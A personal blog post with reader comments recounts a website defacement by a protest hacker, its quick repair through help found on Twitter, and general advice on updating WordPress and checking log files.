I guess it was bound to happen.. There I was happily tweeting away (on twitter obviously) and @jopkins told me something was up with my site.. I myself tweeted what had happened and @loudmouthman of Reduced Hackers was as ever the most easy to hear over the twitter static.
He told me to call him and I did immediately. Less than eight minutes later my site was back up and Nik had fixed it in the simplest of ways by first assessing all of the possibilities and then simply dropping a new index.php file onto my server.
He gave me some invaluable tips on how to protect myself in different ways from other possible attacks and did all of this whilst simultaneously dealing with a client in another part of the UK!
I have changed all of my passwords that could have been compromised but we won’t know for sure how they got in until we get the log files back from www.nxs.nl. Needless to say I have backed up again and realise i am more than a little lucky. Lucky because in about ten years of having websites this is only the second time that this has happened.. The first time was a nightmare. The difference now, is that with a single tweet, an expert like Nik came to the rescue and sorted it out in around half an hour.
Nik is also the reason I have a Drobo sitting under the desk humming away casually backing up all of my data to protect against just such an event like this.
Not wanting to give him too much advertisement, the hacker is Turkish and had placed a page protesting against what he was calling.. ‘Stop Bush Crusade II’. I am wondering if I was targeted as @Delboydare suggested because I have a short photo piece on Kurdistan.. We may never know.
Thanks to all of the other Twitterati that came to my aid with advice and suggestions as to what may have happened and how to sort it. There is a massive writhing beast of knowledge and skill out there in the collective mind.
We are connected.. with our fingers on the keyboards and our eyes fixed to screens.. It is almost as if the technology were grafted to our beings. We are the Twitter Borg.
[Check back in a little while and we may know more about how they got in to the site in the first place.]
Glad you were up and running again so quickly…
I watched this play out over Twitter. Glad to see things get so quickly resolved. Nice job Nik!
You’ve seriously got to upgrade from WP2.5; it’s really insecure. Do it now!
http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
Christian,
As youve already mentioned weve not understood what mechanisms they used to put the bad index.php file onto your server. Its possible they have injected it via a script, or they uploaded it via FTP or via a Shell on the server.
Yes some of this is protected via good password management and good software update policies.
Some of this though should all be appearing in the LOG files which when audited should tell us the route by which they approached your site.
Ive worked for many years with various clients providing advice in relation to improving security or accessing systems ( in a forensic sense ) and much of the diagnostic and then response methods used were very much , by the book.
Im looking forward to getting those log files for your domain and giving you an analytical breakdown of the event. Remember I would also like the log files for the shell if they are available ( .bash_history ) and the FTP stuff.
If people are interested I saved the incriminating index.php file for later review.
Thanks for the write up and if your interested in site security and auditing drop me a line at Loudmouthman or via twitter or Skype.
Thanks.
Hmmm.. apparently Log files were not activated on my hosting. So no information there.